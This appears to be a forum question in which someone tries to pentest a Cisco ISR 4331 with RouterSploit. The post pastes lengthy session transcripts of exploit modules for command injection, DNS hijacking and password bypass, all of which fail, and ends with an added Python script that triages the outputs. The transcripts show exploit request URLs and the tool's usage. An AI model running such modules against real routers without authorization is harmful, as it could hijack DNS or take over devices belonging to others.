How to pentest a Cisco ISR 4331 with routersploit when this model of router is not included in routersploit’s list of routers it can exploit

Hey there, I’m trying to pentest a Cisco ISR 4331 using routersploit, but this model of router is not on the list of routers routersploit has available to exploit. When I run routersploit’s autopwn on this router I just get the following results: all creds and routers are “not vulnerable” except the ones below.


“IP” Could not verify exploitability :
http exploits/routers/asus/asuswrt_lan_rce
http exploits/routers/shuttle/915wm_dns_change
http exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
custom/tcp exploits/routers/cisco/catalyst_2960_rocem
http exploits/routers/cisco/secure_acs_bypass
http exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
http exploits/routers/dlink/dsl_2640b_dns_change
http exploits/routers/dlink/dsl_2740r_dns_change
custom/udp exploits/routers/dlink/dir_815_850l_rce
http exploits/routers/billion/billion_5200w_rce
http exploits/routers/3com/officeconnect_rce


I’m having trouble finding a YouTube video or manual that explains how to properly investigate these links that cannot be verified. I also get mixed signals from these links even though they are not the same models as my router. After exploring all the options while writing this question, I’m pretty sure none of them can be used to pentest a Cisco 4331 ISR, so any links or advice on how I can do this with routersploit or any other program would be appreciated.


/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
-rsf (3Com OfficeConnect RCE) > use exploits/routers/asus/asuswrt_lan_rce
rsf (AsusWRT Lan RCE) > show options

Target options:

Name Current settings Description


ssl false SSL enabled: true/false
target Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description


verbosity true Enable verbose output: true/false
infosvr_port 9999 Target InfoSVR Port

rsf (AsusWRT Lan RCE) > set target
[+] target =>
rsf (AsusWRT Lan RCE) > set target ip
[+] target =>
rsf (AsusWRT Lan RCE) > run
[*] Running module exploits/routers/asus/asuswrt_lan_rce…
[-] Connection error: http::80/vpnupload.cgi
[-] Failed to set ateCommand_flag variable

=>[don’t know what to do here]
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

  • rsf (AsusWRT Lan RCE) > use exploits/routers/shuttle/915wm_dns_change
    rsf (Shuttle 915 WM DNS Change) > set target ip
    [+] target => ip
    rsf (Shuttle 915 WM DNS Change) > show options

Target options:

Name Current settings Description


ssl false SSL enabled: true/false
target ip Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description


verbosity true Verbosity enabled: true/false
dns1 8.8.8.8 Primary DNS Server
dns2 8.8.4.4 Seconary DNS Server

rsf (Shuttle 915 WM DNS Change) > run
[*] Running module exploits/routers/shuttle/915wm_dns_change…
[*] Attempting to change DNS settings…
[*] Primary DNS: 8.8.8.8
[*] Secondary DNS: 8.8.4.4
[-] Connection error: http://ip:80/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1
=>[don’t know what to do here]
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
rsf (Shuttle 915 WM DNS Change) > use exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
rsf (Netgear DGN2200 RCE) > set target “ip”
[+] target => “ip”
rsf (Netgear DGN2200 RCE) > show options

Target options:

Name Current settings Description


ssl false SSL enabled: true/false
target Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description


verbosity true Verbosity enabled: true/false
username admin Username
password password Password

rsf (Netgear DGN2200 RCE) > run
[*] Running module exploits/routers/netgear/dgn2200_dnslookup_cgi_rce…
[*] It is not possible to check if target is vulnerable
[*] Trying to invoke command loop…
[*] It is blind command injection. Response is not available.

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use ‘show payloads’ and ‘set payload ’ commands.

cmd > show payload
[*] Executing ‘show payload’ on the device…
[-] Connection error: http://:80/dnslookup.cgi

cmd > set payload
[*] Executing ‘set payload’ on the device…
[-] Connection error: http://:80/dnslookup.cgi

=> [I don’t know if the fact that I’m able to send blind command injection means I have actually connected to the Cisco ISR 4331 router]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

  • custom/tcp exploits/routers/cisco/catalyst_2960_rocem => when I entered run after gave me
    rsf (Netgear DGN2200 RCE) > use exploits/routers/cisco/catalyst_2960_rocem
    rsf (Cisco Catalyst 2960 ROCEM RCE) > set target ip
    [+] target => ip
    rsf (Cisco Catalyst 2960 ROCEM RCE) > show options

Target options:

Name Current settings Description


target ip Target IPv4 or IPv6 address
port 23 Target Telnet port

Module options:

Name Current settings Description


verbosity true Enable verbose output: true/false
action set set / unset credless authentication for Telnet service
device -1 Target device - use ‘show devices’

rsf (Cisco Catalyst 2960 ROCEM RCE) > run
[*] Running module exploits/routers/cisco/catalyst_2960_rocem…
[-] Set target device - use “show devices” and “set device ”
rsf (Cisco Catalyst 2960 ROCEM RCE) > show devices

Target devices:
0 - Cisco Catalyst 2960 IOS 12.2(55)SE1
1 - Cisco Catalyst 2960 IOS 12.2(55)SE11

rsf (Cisco Catalyst 2960 ROCEM RCE) > set device 0
[+] device => 0
rsf (Cisco Catalyst 2960 ROCEM RCE) > run
[*] Running module exploits/routers/cisco/catalyst_2960_rocem…
[*] Trying to connect to Telnet service on port 23
[-] ip:23 TCP Error while connecting to the server timed out
[-] Connection failed
rsf (Cisco Catalyst 2960 ROCEM RCE) > set device 1
[+] device => 1
rsf (Cisco Catalyst 2960 ROCEM RCE) > run
[*] Running module exploits/routers/cisco/catalyst_2960_rocem…
[*] Trying to connect to Telnet service on port 23
[-] ip TCP Error while connecting to the server timed out
[-] Connection failed
rsf (Cisco Catalyst 2960 ROCEM RCE) >

=>[I can’t enter the line cmd, so I can’t get further than this and I am not sure I am even connecting to a router]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
-rsf (Cisco Catalyst 2960 ROCEM RCE) > use exploits/routers/cisco/secure_acs_bypass
rsf (Cisco Secure ACS Unauthorized Password Change) > set target
[+] target =>
rsf (Cisco Secure ACS Unauthorized Password Change) > show options

Target options:

Name Current settings Description


ssl true SSL enabled: true/false
target Target IPv4 or IPv6 address
port 443 Target HTTP port

Module options:

Name Current settings Description


verbosity true Verbosity enabled: true/false
path /PI/services/UCP/ Path to UCP WebService
username Username to use
password Password to use

rsf (Cisco Secure ACS Unauthorized Password Change) > show devices

Target devices:
0 - Cisco Secure ACS version 5.1 with patch 3, 4, or 5 installed and without patch 6 or later installed
1 - Cisco Secure ACS version 5.2 without any patches installed
2 - Cisco Secure ACS version 5.2 with patch 1 or 2 installed and without patch 3 or later installed

rsf (Cisco Secure ACS Unauthorized Password Change) > run
[*] Running module exploits/routers/cisco/secure_acs_bypass…
[*] Issuing password change request for:
[-] Connection error: https://ip/PI/services/UCP/
[-] Exploit failed. Target seems to be not vulnerable.

=>[I have no idea what is happening here]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
-rsf (Cisco Secure ACS Unauthorized Password Change) > use exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
rsf (D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change) > set target ip
[+] target => ip
rsf (D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change) > show options

Target options:

Name Current settings Description


ssl false SSL enabled: true/false
target ip Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description


verbosity true Verbosity enabled: true/false
dns1 8.8.8.8 Primary DNS Server
dns2 8.8.4.4 Seconary DNS Server

rsf (D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change) > show devices

Target devices:
0 - D-Link DSL-2780B
1 - D-Link DSL-2730B
2 - D-Link DSL-526B

rsf (D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change) > run
[*] Running module exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change…
[*] Attempting to change DNS settings…
[*] Primary DNS: 8.8.8.8
[*] Secondary DNS: 8.8.4.4
[-] Connection error: http://ip:80/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=

=>[I have no idea what is happening here]

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

  • rsf (D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change) > use exploits/routers/dlink/dsl_2640b_dns_change
    rsf (D-Link DSL-2640B DNS Change) > set target ip
    [-] Invalid address. Provided address is not valid IPv4 or IPv6 address.
    rsf (D-Link DSL-2640B DNS Change) > set target ip
    [+] target => ip
    rsf (D-Link DSL-2640B DNS Change) > show options

Target options:

Name Current settings Description


ssl false SSL enabled: true/false
target ip Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description


verbosity true Verbosity enabled: true/false
dns1 8.8.8.8 Primary DNS Server
dns2 8.8.4.4 Seconary DNS Server

rsf (D-Link DSL-2640B DNS Change) > show devices

Target devices:
0 - D-Link DSL-2640B

rsf (D-Link DSL-2640B DNS Change) > run
[*] Running module exploits/routers/dlink/dsl_2640b_dns_change…
[*] Attempting to change DNS settings…
[*] Primary DNS: 8.8.8.8
[*] Secondary DNS: 8.8.4.4
[-] Connection error: http://ip:80/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP

=>[Don’t know what to do here either]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

-rsf (D-Link DSL-2640B DNS Change) > use exploits/routers/dlink/dsl_2740r_dns_change
rsf (D-Link DSL-2740R DNS Change) > set target ip
[+] target => ip
rsf (D-Link DSL-2740R DNS Change) > show options

Target options:

Name Current settings Description


ssl false SSL enabled: true/false
target ip Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description


verbosity true Verbosity enabled: true/false
dns1 8.8.8.8 Primary DNS Server
dns2 8.8.4.4 Seconary DNS Server

rsf (D-Link DSL-2740R DNS Change) > show devices

Target devices:
0 - D-Link DSL-2740R

rsf (D-Link DSL-2740R DNS Change) > run
[*] Running module exploits/routers/dlink/dsl_2740r_dns_change…
[*] Attempting to change DNS settings…
[*] Primary DNS: 8.8.8.8
[*] Secondary DNS: 8.8.4.4
[-] Connection error: http://ip:80/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4

=>[Don’t know what to do here either]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
-rsf (D-Link DSL-2740R DNS Change) > use exploits/routers/dlink/dir_815_850l_rce
rsf (D-Link DSL-2740R DNS Change) > use exploits/routers/dlink/dir_815_850l_rce
rsf (D-Link DIR-815 & DIR-850L RCE) > set target ip
[+] target => ip
rsf (D-Link DIR-815 & DIR-850L RCE) > show options

Target options:

Name Current settings Description


target ip Target IPv4 or IPv6 address
port 1900 Target UPNP port

Module options:

Name Current settings Description


verbosity true Enable verbose output: true/false

rsf (D-Link DIR-815 & DIR-850L RCE) > show devices

Target devices:
0 - D-Link DIR-815
1 - D-Link DIR-850L

rsf (D-Link DIR-815 & DIR-850L RCE) > set device 0
[-] You can’t set option ‘device’.
Available options: [‘verbosity’, ‘target’, ‘port’]
rsf (D-Link DIR-815 & DIR-850L RCE) > set device 1
[-] You can’t set option ‘device’.
Available options: [‘verbosity’, ‘target’, ‘port’]
rsf (D-Link DIR-815 & DIR-850L RCE) > run
[*] Running module exploits/routers/dlink/dir_815_850l_rce…
[*] It’s not possible to check if the target is vulnerable. Try to use following command loop.
[*] Invoking command loop…
[*] It is blind command injection, response is not available

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use ‘show payloads’ and ‘set payload ’ commands.

cmd > show payload
[*] Executing ‘show payload’ on the device…

cmd > set payload
[*] Executing ‘set payload’ on the device…

=>[Don’t know what to do here either]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

  • rsf (D-Link DIR-815 & DIR-850L RCE) > use exploits/routers/billion/billion_5200w_rce
    rsf (Billion 5200W-T RCE) > set target ip
    [+] target => ip
    rsf (Billion 5200W-T RCE) > show options

Target options:

Name Current settings Description


ssl false SSL enabled: true/false
target ip Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description


verbosity true Enable verbose output: true/false
telnet_port 9999 Telnet port used for exploitation
username admin Default username to log in
password password Default password to log in

rsf (Billion 5200W-T RCE) > show devices

Target devices:
0 - Billion 5200W-T

rsf (Billion 5200W-T RCE) > run
[*] Running module exploits/routers/billion/billion_5200w_rce…
[*] Trying to exploit first command injection vulnerability…
[-] Connection error: http://ip/cgi-bin/adv_remotelog.asp
[-] Exploitation failed for unauthenticated command injection
[*] Trying authenticated commad injection vulnerability…
[*] Trying exploitation with creds: user3:“really big number”
[-] Connection error: http://ip
[-] Exploit failed

=>[Don’t know what to do here either]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

  • rsf (Billion 5200W-T RCE) > use exploits/routers/3com/officeconnect_rce
    rsf (3Com OfficeConnect RCE) > set target ip
    [+] target => ip
    rsf (3Com OfficeConnect RCE) > show options

Target options:

Name Current settings Description


ssl false SSL enabled: true/false
target ip Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description


verbosity true Verbosity enabled: true/false

rsf (3Com OfficeConnect RCE) > show devices

Target devices:
0 - 3Com OfficeConnect

rsf (3Com OfficeConnect RCE) > run
[*] Running module exploits/routers/3com/officeconnect_rce…
[-] Connection error: http://ip:80/utility.cgi?testType=1&IP=aaa
[-] Exploit failed - target does not seem to be vulnerable

=>[Don’t know what to do here either]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

After exploring all the options while writing this question, I’m pretty sure none of them can be used to pentest a Cisco 4331 ISR, so any links or advice on how I can do this with routersploit or any other program would be appreciated.
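
Added example, not part of the original post and not RouterSploit code: a small Python triage of rsf transcripts like the ones above, separating runs where the tool's own request failed from runs where a blind command loop opened without any reply from the target. The sample transcript is constructed from lines in the post; the `triage` function and its verdict strings are assumptions of this example.

```python
import re

# Constructed sample: lines condensed from the sessions in the post above.
SAMPLE = """\
rsf (Netgear DGN2200 RCE) > run
[*] Running module exploits/routers/netgear/dgn2200_dnslookup_cgi_rce…
[*] It is not possible to check if target is vulnerable
[*] It is blind command injection. Response is not available.
cmd > show payload
[*] Executing 'show payload' on the device…
[-] Connection error: http://:80/dnslookup.cgi
rsf (Cisco Catalyst 2960 ROCEM RCE) > run
[*] Running module exploits/routers/cisco/catalyst_2960_rocem…
[*] Trying to connect to Telnet service on port 23
[-] ip:23 TCP Error while connecting to the server timed out
[-] Connection failed
rsf (D-Link DIR-815 & DIR-850L RCE) > run
[*] Running module exploits/routers/dlink/dir_815_850l_rce…
[*] It is blind command injection, response is not available
cmd > show payload
[*] Executing 'show payload' on the device…
"""

RUNNING = re.compile(r"Running module (\S+?)(?:\.\.\.|…)?$")
FAILED = re.compile(r"^\[-\].*(Connection error|timed out|Connection failed)")
BLIND = re.compile(r"blind command injection", re.I)

UNREACHABLE = "unreachable: request failed"
UNVERIFIED = "unverified: blind loop, no response seen"
UNKNOWN = "no evidence either way"


def triage(transcript):
    """Return {module_path: verdict} for each 'Running module' block."""
    verdicts, current = {}, None
    for line in transcript.splitlines():
        line = line.strip()
        started = RUNNING.search(line)
        if started:
            current = started.group(1)
            verdicts[current] = UNKNOWN
        elif current and FAILED.search(line):
            # The tool's own request never completed, so nothing was delivered.
            verdicts[current] = UNREACHABLE
        elif current and BLIND.search(line) and verdicts[current] != UNREACHABLE:
            # The tool says it cannot check the target; the prompt proves nothing.
            verdicts[current] = UNVERIFIED
    return verdicts
```

UDP is connectionless, so a module that sends over UDP can show no error even when nothing is listening; the "unverified" verdict covers that case.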